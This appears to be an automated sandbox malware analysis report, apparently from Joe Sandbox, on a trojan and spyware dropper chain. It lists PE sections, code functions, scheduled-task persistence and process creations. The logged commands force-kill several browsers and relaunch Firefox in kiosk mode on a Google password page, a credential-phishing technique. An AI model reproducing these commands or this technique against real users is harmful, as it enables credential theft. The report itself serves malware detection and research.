memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_0c647206-b
Source: 2ada66c192.exe, 0000001E.00000002.2915748492.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_1303e518-c
Source: 2ada66c192.exe, 0000001E.00000002.2915748492.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_418b65b3-6
Source: 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_7f544493-d
Source: 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_7fab1405-2
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: ae5cfd188c.exe.6.dr Static PE information: section name:
Source: ae5cfd188c.exe.6.dr Static PE information: section name: .idata
Source: ae5cfd188c.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 37df924488.exe.6.dr Static PE information: section name:
Source: 37df924488.exe.6.dr Static PE information: section name: .idata
Source: 37df924488.exe.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: 9c2827fca4.exe.6.dr Static PE information: section name:
Source: 9c2827fca4.exe.6.dr Static PE information: section name: .idata
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ABCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_00ABCB97
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD5EB: CreateFileW,DeviceIoControl,CloseHandle, 11_2_006DD5EB
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 11_2_006D1201
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 11_2_006DE8F6
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A278BB 0_2_00A278BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A28860 0_2_00A28860
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A27049 0_2_00A27049
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A231A8 0_2_00A231A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF81D3 0_2_00AF81D3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF8101 0_2_00AF8101
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009E4B30 0_2_009E4B30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009E4DE0 0_2_009E4DE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A22D10 0_2_00A22D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2779B 0_2_00A2779B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A17F36 0_2_00A17F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE78BB 1_2_00AE78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE8860 1_2_00AE8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE7049 1_2_00AE7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE31A8 1_2_00AE31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AA4B30 1_2_00AA4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AA4DE0 1_2_00AA4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE2D10 1_2_00AE2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE779B 1_2_00AE779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AD7F36 1_2_00AD7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE78BB 2_2_00AE78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE8860 2_2_00AE8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE7049 2_2_00AE7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE31A8 2_2_00AE31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AA4B30 2_2_00AA4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AA4DE0 2_2_00AA4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE2D10 2_2_00AE2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE779B 2_2_00AE779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AD7F36 2_2_00AD7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AAE530 6_2_00AAE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AC6192 6_2_00AC6192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE8860 6_2_00AE8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AA4B30 6_2_00AA4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AA4DE0 6_2_00AA4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE2D10 6_2_00AE2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AC0E13 6_2_00AC0E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE7049 6_2_00AE7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE31A8 6_2_00AE31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AC1602 6_2_00AC1602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE779B 6_2_00AE779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE78BB 6_2_00AE78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AC3DF1 6_2_00AC3DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AD7F36 6_2_00AD7F36
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0067BF40 11_2_0067BF40
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00678060 11_2_00678060
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E2046 11_2_006E2046
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D8298 11_2_006D8298
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006AE4FF 11_2_006AE4FF
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A676B 11_2_006A676B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00704873 11_2_00704873
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0067CAF0 11_2_0067CAF0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0069CAA0 11_2_0069CAA0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068CC39 11_2_0068CC39
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A6DD9 11_2_006A6DD9
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068D065 11_2_0068D065
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068B119 11_2_0068B119
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006791C0 11_2_006791C0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00691394 11_2_00691394
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00691706 11_2_00691706
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0069781B 11_2_0069781B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068997D 11_2_0068997D
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00677920 11_2_00677920
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006919B0 11_2_006919B0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00697A4A 11_2_00697A4A
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00691C77 11_2_00691C77
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00697CA7 11_2_00697CA7
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006FBE44 11_2_006FBE44
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A9EEE 11_2_006A9EEE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00691F32 11_2_00691F32
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe 1D95373C2284B657B614F07051EED5FED72F34F787350409E49E8DC30A5EA494
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe 9661D8306B9BF658642A01718AC746113E19741A560A48A5583BACD52998AF22
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe 2A68C5304DEEBB741759B134BE32D6C0F8E64DFBB8C06D9765E3035D3AF6CBFD
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 009F80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: String function: 00690A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: String function: 0068F9F2 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00AB7A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00ABD64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00ABD663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00ABD942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00ABDF80 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00AD8E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00AB80C0 appears 393 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.997627865484429
Source: random[1].exe.6.dr Static PE information: Section: xyjapqsh ZLIB complexity 0.9942076156859846
Source: ae5cfd188c.exe.6.dr Static PE information: Section: ZLIB complexity 0.997627865484429
Source: ae5cfd188c.exe.6.dr Static PE information: Section: xyjapqsh ZLIB complexity 0.9942076156859846
Source: random[1].exe0.6.dr Static PE information: Section: ipnqzgkg ZLIB complexity 0.9949173823395884
Source: 37df924488.exe.6.dr Static PE information: Section: ipnqzgkg ZLIB complexity 0.9949173823395884
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@85/20@28/14
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E37B5 GetLastError,FormatMessageW, 11_2_006E37B5
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D10BF AdjustTokenPrivileges,CloseHandle, 11_2_006D10BF
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 11_2_006D16C3
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 11_2_006E51CD
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 11_2_006DD4DC
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 11_2_006E648E
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 11_2_006742A2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ae5cfd188c.exe, 00000007.00000003.2497427727.0000000005624000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2498097741.0000000005600000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631430591.0000000005420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 55%
Source: 37df924488.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ae5cfd188c.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2192 -prefMapHandle 2184 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55e86b5f-3953-4278-9a52-23c7c331b436} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba49c6e110 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4116 -parentBuildID 20230927232528 -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f1a1788-4a6a-4b44-adb8-7b34c81ea1a2} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba5bd78210 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
